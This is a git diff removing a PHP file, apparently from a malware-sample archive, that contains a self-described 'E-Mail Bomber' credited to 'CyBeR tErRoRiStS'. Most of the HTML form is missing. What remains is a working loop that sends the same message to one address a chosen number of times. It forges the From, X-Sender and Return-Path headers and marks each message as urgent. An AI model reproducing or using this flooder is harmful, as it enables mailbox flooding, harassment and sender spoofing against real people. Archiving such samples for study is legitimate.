diff --git a/PHP/Flooder.PHP.MailSpam.x b/PHP/Flooder.PHP.MailSpam.x
deleted file mode 100644
index ca5bc8b6..00000000
--- a/PHP/Flooder.PHP.MailSpam.x
+++ /dev/null
@@ -1,69 +0,0 @@
-
-
-
-
-[- Xp|01t3R's -] - E-Mail Bomber
-
-
-
-
-[*CyBeR tErRoRiStS*]
- - E-Mail Bomber
-
-
-
-
-
-
-
-
-} else {
-
-$i = 0;
-
-while ($i < $times) {
-
-$headers .= "From: $from<$from>\n";
-$headers .= "X-Sender: <$from>\n";
-$headers .= "X-Mailer: PHP\n"; //mailer
-$headers .= "X-Priority: 1\n"; //1 UrgentMessage, 3 Normal
-$headers .= "Return-Path: <$from>\n";
-$headers .= "Content-Type: text/html; charset=iso-8859-1\n";
-$headers .= "cc:\n"; // CC to
-$headers .= "bcc:"; // BCCs to, separete
-
-mail($to, $subject, $message, $headers) or die("Could Not Send Message");
-
-$i++;
-}
-
-die("Finished Sending Message $times Times to $to");
-
-}
-?>